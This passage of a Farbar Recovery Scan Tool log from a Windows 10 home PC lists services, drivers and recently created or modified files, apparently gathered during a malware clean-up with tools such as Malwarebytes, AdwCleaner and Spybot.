    R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
    R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
    S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
    S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
    S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
    R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
    R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
    S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
    S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
    S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
    R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
    R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
    R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
    S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
    S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
    R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
    R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
    R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
    S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
    S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
    R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
    U3 idsvc; no ImagePath
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    U3 wpcsvc; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-01 21:57 - 2016-03-01 22:10 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
    2016-03-01 21:55 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Downloads\mbar-1.09.3.1001
    2016-03-01 21:53 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Desktop\mbar-1.09.3.1001
    2016-03-01 21:52 - 2016-03-01 21:54 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Kym\Downloads\mbar-1.09.3.1001.exe
    2016-03-01 21:48 - 2016-03-01 21:48 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
    2016-03-01 12:40 - 2016-03-01 21:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-03-01 12:40 - 2016-03-01 21:56 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000692 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-03-01 12:40 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-03-01 12:40 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-03-01 12:39 - 2016-03-01 12:39 - 00000159 _____ C:\Users\Kym\Desktop\ckfiles.txt
    2016-03-01 12:36 - 2016-03-01 12:36 - 00001001 _____ C:\Users\Kym\Desktop\JRT.txt
    2016-03-01 12:33 - 2016-03-01 12:33 - 00005519 _____ C:\Users\Kym\Desktop\AdwCleaner[C1].txt
    2016-03-01 12:27 - 2016-03-01 12:31 - 00000000 ____D C:\AdwCleaner
    2016-03-01 12:24 - 2016-03-01 12:39 - 22908888 _____ (Malwarebytes ) C:\Users\Kym\Desktop\mbam-setup-2-2-0-1024.exe
    2016-03-01 12:24 - 2016-03-01 12:38 - 00468480 _____ () C:\Users\Kym\Desktop\CKScanner.exe
    2016-03-01 12:23 - 2016-03-01 12:34 - 01609216 _____ (Malwarebytes) C:\Users\Kym\Desktop\JRT.exe
    2016-03-01 12:21 - 2016-03-01 12:27 - 01518592 _____ C:\Users\Kym\Desktop\AdwCleaner.exe
    2016-03-01 12:19 - 2016-03-01 12:20 - 00016163 _____ C:\Users\Kym\Desktop\Fixlog.txt
    2016-02-29 20:50 - 2016-02-29 20:50 - 00002245 _____ C:\Users\Kym\Desktop\aswMBR.txt
    2016-02-29 20:50 - 2016-02-29 20:50 - 00000512 _____ C:\Users\Kym\Desktop\MBR.dat
    2016-02-29 20:46 - 2016-03-01 22:11 - 00026829 _____ C:\Users\Kym\Desktop\FRST.txt
    2016-02-29 20:46 - 2016-02-29 20:47 - 00072356 _____ C:\Users\Kym\Desktop\Addition.txt
    2016-02-29 20:43 - 2016-03-01 22:11 - 00000000 ____D C:\FRST
    2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
    2016-02-29 20:38 - 2016-02-29 20:47 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
    2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
    2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
    2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
    2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
    2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
    2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
    2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
    2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
    2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
    2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
    2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
    2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
    2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
    2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
    2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
    2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
    2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
    2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
    2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
    2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
    2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
    2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
    2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
    2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
    2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
    2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
    2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
    2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
    2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
    2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
    2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
    2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
    2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
    2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
    2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
    2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
    2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-01 22:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-03-01 21:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-03-01 20:14 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
    2016-03-01 17:06 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-03-01 13:55 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
    2016-03-01 12:54 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-03-01 12:54 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
    2016-03-01 12:52 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
    2016-03-01 12:48 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
    2016-03-01 12:48 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2016-03-01 12:48 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-03-01 12:48 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\addins
    2016-03-01 12:48 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-03-01 12:19 - 2015-08-09 17:12 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Temp
    2016-03-01 12:19 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
    2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
    2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
    2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
    2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
    2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
    2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
    2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
    2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
    2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
    2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
    2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
    2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
    2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
    2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
    2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
    2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
    2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
    2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
    2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
    2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
    2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
    2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
    2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
    2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
    2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
    2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
    2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

    ==================== Files in the root of some directories =======

    2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
    2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
    2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
